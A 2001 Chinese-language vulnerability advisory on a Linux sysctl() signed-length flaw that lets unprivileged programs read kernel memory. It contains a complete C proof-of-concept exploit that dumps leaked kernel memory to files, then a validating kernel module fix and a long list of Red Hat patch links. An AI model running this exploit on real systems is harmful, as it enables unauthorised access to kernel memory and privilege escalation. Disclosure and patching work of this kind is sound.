Linux sysctl() 存在内核内存可读漏洞发布时间:2001-02-16 更新时间:2001-02-16 严重程度:高 威胁程度:权限提升 错误类型:设计错误 利用方式:服务器模式 受影响系统 受影响系统:详细描述 LINUX内核在一个问题会引起ROOT级的危害,sysctl()调用允许一有特权的程序去读和写内核参数,但存在这样的可能:权利不够的程序也可以使用这个系统调用在内核中查询值。系统调用接受有符号的值,所以允许提供负值去获取最开始内存以下的设置和内容。导致用户浏览内核空间地址,或者提升权利。 测试代码 /* sysctl_exp.c - Chris Evans - February 9, 2001 */ /* Excuse the lack of error checking */ #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/mman.h> #include <unistd.h> #include <linux/unistd.h> #include <linux/sysctl.h> _syscall1(int, _sysctl, struct __sysctl_args *, args); #define BUFLEN 1000000 int main(int argc, const char* argv[]) { struct __sysctl_args args_of_great_doom; int names[2] = { CTL_KERN, KERN_NODENAME }; /* Minus 2 billion - somewhere close to biggest negative int */ int dodgy_len = -2000000000; int fd; char* p_buf; fd = open("/dev/zero", O_RDWR); p_buf = mmap((void*)8192, BUFLEN, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE, fd, 0); memset(p_buf, '\0', BUFLEN); fd = open("before", O_CREAT | O_TRUNC | O_WRONLY, 0777); write(fd, p_buf, BUFLEN); args_of_great_doom.name = names; args_of_great_doom.nlen = 2; args_of_great_doom.oldval = p_buf; args_of_great_doom.oldlenp = &dodgy_len; args_of_great_doom.newval = 0; args_of_great_doom.newlen = 0; _sysctl(&args_of_great_doom); fd = open("after", O_CREAT | O_TRUNC | O_WRONLY, 0777); write(fd, p_buf, BUFLEN); } 解决方案 解决方法: 升级程序: 下面的内核模块有Stephen White <swhite@ox.compsoc.net>提供 /* Stephen White 10/2/2001 swhite@ox.compsoc.net sysctl_fix.c, compile: gcc -Wall -DMODULE -D__KERNEL__ -c sysctl_fix.c (on Redhat/UltraSparc with sparc64-linux-gcc -m64 -mno-fpu -mcmodel=medlow -mcpu=ultrasparc -ffixed-g4 -fcall-used-g5 -fcall-used-g7 -Wall -DMODULE -D__KERNEL__ -c sysctl_fix.c ) Prevent sysctl exploit discovered by Chris Evans by properly validating input against negative numbers, */ #include <linux/kernel.h> #include <linux/config.h> #include <linux/module.h> #include <linux/version.h> #include <linux/types.h> #include <linux/errno.h> #include <linux/sched.h> #include <sys/syscall.h> #include <linux/linkage.h> #include <asm/uaccess.h> #include <linux/sysctl.h> extern void *sys_call_table[]; int (*old_sysctl)(struct __sysctl_args *args); asmlinkage int validate_sysctl(struct __sysctl_args *args) { struct __sysctl_args tmp; if(copy_from_user(&tmp, args, sizeof(tmp))) return -EFAULT; if (tmp.nlen < 0) goto bad; if (tmp.oldval) { int old_len; if (copy_from_user(&old_len, tmp.oldlenp, sizeof(old_len))) return -EFAULT; if (old_len < 0) goto bad; } if (tmp.newval) if (tmp.newlen < 0) goto bad; return (*old_sysctl)(args); bad: printk("sysctl: arguments failed sanity check for user %i\n",current->uid); return -EINVAL; } int init_module() { old_sysctl = sys_call_table[__NR__sysctl]; sys_call_table[__NR__sysctl] = validate_sysctl; return 0; } void cleanup_module() { sys_call_table[__NR__sysctl] = old_sysctl; } 另外存在升级程序: Linux kernel 2.2.18 and previous: Red Hat Inc. RPM 6.x sparc kernel-smp-2.2.17-14.sparc64.rpm ftp://updates.redhat.com/6.2/sparc64/kernel-smp-2.2.17-14.sparc64.rpm Red Hat Inc. RPM 6.x i586 kernel-2.2.17-14.i586.rpm ftp://updates.redhat.com/6.2/i586/kernel-2.2.17-14.i586.rpm Red Hat Inc. RPM 7.0 alpha kernel-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 i386 kernel-pcmcia-cs-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-pcmcia-cs-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x alpha kernel-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-BOOT-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-BOOT-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-doc-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-doc-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-enterprise-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-enterprise-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-headers-2.2.16-3.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-headers-2.2.16-3.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-smp-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-smp-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-source-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-source-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-utils-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-utils-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x i386 kernel-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-BOOT-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-BOOT-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-doc-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-doc-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-headers-2.2.16-3.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-headers-2.2.16-3.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-ibcs-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-ibcs-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-pcmcia-cs-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-pcmcia-cs-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-smp-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-smp-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-source-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-source-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-utils-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-utils-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i586 kernel-smp-2.2.17-14.i586.rpm ftp://updates.redhat.com/6.2/i586/kernel-smp-2.2.17-14.i586.rpm Red Hat Inc. RPM 6.x i686 kernel-2.2.17-14.i686.rpm ftp://updates.redhat.com/6.2/i686/kernel-2.2.17-14.i686.rpm Red Hat Inc. RPM 6.x i686 kernel-enterprise-2.2.17-14.i686.rpm ftp://updates.redhat.com/6.2/i686/kernel-enterprise-2.2.17-14.i686.rpm Red Hat Inc. RPM 6.x i686 kernel-smp-2.2.17-14.i686.rpm ftp://updates.redhat.com/6.2/i686/kernel-smp-2.2.17-14.i686.rpm Red Hat Inc. RPM 6.x sparc kernel-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-BOOT-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-BOOT-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-BOOT-2.2.17-14.sparc64.rpm ftp://updates.redhat.com/6.2/sparc64/kernel-BOOT-2.2.17-14.sparc64.rpm Red Hat Inc. RPM 6.x sparc kernel-doc-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-doc-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-enterprise-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-enterprise-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-enterprise-2.2.17-14.sparc64.rpm ftp://updates.redhat.com/6.2/sparc64/kernel-enterprise-2.2.17-14.sparc64.rpm Red Hat Inc. RPM 6.x sparc kernel-headers-2.2.16-3.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-headers-2.2.16-3.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-smp-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-smp-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-source-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-source-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-utils-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-utils-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc64 kernel-2.2.17-14.sparc64.rpm ftp://updates.redhat.com/6.2/sparc64/kernel-2.2.17-14.sparc64.rpm Red Hat Inc. RPM 7.0 alpha kernel-BOOT-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-BOOT-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 alpha kernel-doc-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-doc-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 alpha kernel-enterprise-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-enterprise-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 alpha kernel-smp-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-smp-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 alpha kernel-source-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-source-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 alpha kernel-utils-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-utils-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 i386 kernel-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-BOOT-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-BOOT-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-doc-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-doc-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-ibcs-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-ibcs-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-smp-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-smp-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-source-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-source-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-utils-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-utils-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i586 kernel-2.2.17-14.i586.rpm ftp://updates.redhat.com/7.0/i586/kernel-2.2.17-14.i586.rpm Red Hat Inc. RPM 7.0 i586 kernel-smp-2.2.17-14.i586.rpm ftp://updates.redhat.com/7.0/i586/kernel-smp-2.2.17-14.i586.rpm Red Hat Inc. RPM 7.0 i686 kernel-2.2.17-14.i686.rpm ftp://updates.redhat.com/7.0/i686/kernel-2.2.17-14.i686.rpm Red Hat Inc. RPM 7.0 i686 kernel-enterprise-2.2.17-14.i686.rpm ftp://updates.redhat.com/7.0/i686/kernel-enterprise-2.2.17-14.i686.rpm Red Hat Inc. RPM 7.0 i686 kernel-smp-2.2.17-14.i686.rpm ftp://updates.redhat.com/7.0/i686/kernel-smp-2.2.17-14.i686.rpm Solar Designer patch 2.2.18-ow4 http://www.openwall.com/linux/ Solar Designer patch 2.0.39-ow2 http://www.openwall.com/linux/ 相关信息 |
